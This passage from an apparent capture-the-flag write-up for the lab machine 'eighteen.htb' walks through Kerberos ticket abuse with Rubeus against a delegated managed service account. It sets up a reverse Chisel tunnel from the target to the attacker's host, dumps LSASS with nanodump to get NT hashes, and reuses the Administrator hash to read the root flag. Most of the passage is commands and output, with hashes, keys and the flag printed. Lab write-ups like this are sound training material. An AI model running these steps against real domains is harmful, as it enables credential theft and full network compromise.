evil-winrm-py PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgt /user:PwnedMachine$ /aes256:BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1 /domain:eighteen.htb /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\PwnedMachine$'
[*] Using domain controller: fe80::9d77:3dfa:f581:2714%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/eighteen.htb
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  PwnedMachine$ (NT_PRINCIPAL)
  UserRealm                :  EIGHTEEN.HTB
  StartTime                :  1/29/2026 10:44:49 AM
  EndTime                  :  1/29/2026 8:44:49 PM
  RenewTill                :  2/5/2026 10:44:49 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  hros42827gVLxCoJZ9odJ++GbTreZe0PrAc1vywmY3s=
  ASREP (key)              :  BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1

We will use this TGT to ask for a TGS targeting the dMSA:

evil-winrm-py PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgs /targetuser:Pwned_DMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /ticket: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

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'Pwned_DMSA$' from 'PwnedMachine$'
[+] Sequence number is: 633938499
[*] Using domain controller: DC01.eighteen.htb (fe80::9d77:3dfa:f581:2714%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  Pwned_DMSA$ (NT_PRINCIPAL)
  UserRealm                :  eighteen.htb
  StartTime                :  1/29/2026 10:46:57 AM
  EndTime                  :  1/29/2026 11:01:57 AM
  RenewTill                :  2/5/2026 10:44:49 AM
  Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  3VawaH9McAKOuAauu2z2AOO/tY18KVxWW/fz6l0sLvM=
  Current Keys for Pwned_DMSA$: (aes256_cts_hmac_sha1) 390D3BAD0C0F5C72154FD8B13A66E45AE7DF0AE8A5481BA1818B3212D9FE8ABC

Since the DC doesn’t expose any other open ports, we can use a Chisel tunnel and port forward some useful ports such as Kerberos, WinRM, SMB, LDAP, NetBIOS, and WMI. First, start a Chisel server on your attacking machine:

mairon $ sudo chisel server --reverse --port 9002
2026/01/29 16:38:15 server: Reverse tunnelling enabled
2026/01/29 16:38:15 server: Fingerprint 6IcpxS5ZxGmasnkSuawTFYGOESDGmfKLCl/bMTgjGWk=
2026/01/29 16:38:15 server: Listening on http://0.0.0.0:9002

Then upload chisel.exe, connect to the server, and port forward these useful ports:

evil-winrm-py PS C:\Users\adam.scott\Documents> upload ~/htb/chisel.exe .
Uploading /home/mairon/htb/chisel.exe: 10.1MB [00:11, 905kB/s]
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\chisel.exe
evil-winrm-py PS C:\Users\adam.scott\Documents> .\chisel.exe client 10.10.14.74:9002 R:88:localhost:88 R:5985:localhost:5985 R:445:localhost:445 R:389:localhost:389 R:137/udp:localhost:137/udp R:139:localhost:139 R:138/udp:localhost:138/udp R:137:localhost:137 R:135:localhost:135

Now we can use our TGS from our attacking system directly. First we need to convert it from kirbi to ccache:

mairon $ echo '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' > ticket.kirbi.b64
mairon $ base64 -d ticket.kirbi.b64 > ticket.kirbi
mairon $ ticketConverter.py ticket.kirbi ticket.ccache
mairon $ export KRB5CCNAME=ticket.ccache

Chances are this ticket has since expired, as it’s only valid for 15 minutes. Also, the DC seems to remove our dMSA periodically, so you might need to recreate and reconfigure it. And to make our lives more miserable, there is a clock skew of 7 hours, which causes KRB_AP_ERR_SKEW (Clock skew too great) errors. Pretty annoying…

The clock skew can be worked around by prepending faketime -f '+7h' to your commands.

Geez, I tried so many things from here: secretsdump.py didn’t work for dumping NTDS.dit, neither via DRSUAPI nor via VSS. Neither could I log in with the ticket via wmiexec.py, smbclient.py (there aren’t any administrative shares available) or evil-winrm. NetExec also failed me plenty of times trying to log in via WMI, WinRM and SMB, and trying to dump NTDS.dit.

Dumping SAM worked, though, but I did not manage to log in with the retrieved Administrator hash. Dumping LSA also worked, which got me the AES key and NT hash of the DC01$ computer account. Getting a TGT with that AES key worked, but it also did not let me log in via the aforementioned protocols.

I was losing it. The only thing that eventually worked, after way too many hours lost, was the nanodump module:

mairon $ faketime -f '+7h' nxc smb --use-kcache --kdcHost 127.0.0.1 127.0.0.1 -M nanodump
SMB         127.0.0.1       445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         127.0.0.1       445    DC01             [+] eighteen.htb\Pwned_DMSA$ from ccache (Pwn3d!)
NANODUMP    127.0.0.1       445    DC01             [*] 64-bit Windows detected.
NANODUMP    127.0.0.1       445    DC01             [+] Created file nano.exe on the \\C$\Windows\Temp\
NANODUMP    127.0.0.1       445    DC01             [*] Getting LSASS PID via command tasklist /v /fo csv | findstr /i "lsass"
SMB         127.0.0.1       445    DC01             [-] WMIEXEC: Dcom initialization failed on connection with stringbinding: "ncacn_ip_tcp:DC01.eighteen.htb[63482]", please increase the timeout with the option "--dcom-timeout". If it's still failing maybe something is blocking the RPC connection, try another exec method
NANODUMP    127.0.0.1       445    DC01             [*] Executing command C:\Windows\Temp\nano.exe --pid 820 --write C:\Windows\Temp\20260129_2339.log
SMB         127.0.0.1       445    DC01             [-] WMIEXEC: Dcom initialization failed on connection with stringbinding: "ncacn_ip_tcp:DC01.eighteen.htb[63482]", please increase the timeout with the option "--dcom-timeout". If it's still failing maybe something is blocking the RPC connection, try another exec method
NANODUMP    127.0.0.1       445    DC01             [+] Process lsass.exe was successfully dumped
NANODUMP    127.0.0.1       445    DC01             [*] Copying 20260129_2339.log to host
NANODUMP    127.0.0.1       445    DC01             [+] Dumpfile of lsass.exe was transferred to /tmp/DC01_64_eighteen.htb.log
NANODUMP    127.0.0.1       445    DC01             [+] Deleted nano file on the C$ share
NANODUMP    127.0.0.1       445    DC01             [+] Deleted lsass.dmp file on the C$ share
NANODUMP    127.0.0.1       445    DC01             EIGHTEEN\Administrator:0b133be956bfaddf9cea56701affddec
NANODUMP    127.0.0.1       445    DC01             EIGHTEEN\mssqlsvc:c44d16951b0810e8f3bbade300966ec4

That gave me a usable NT hash I could replay:

mairon $ ewp -i localhost -u Administrator -H 0b133be956bfaddf9cea56701affddec
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to 'localhost:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> cat ..\Desktop\root.txt
af45f4c3b64a772f01e39b0138a1db98
pwned

Finally…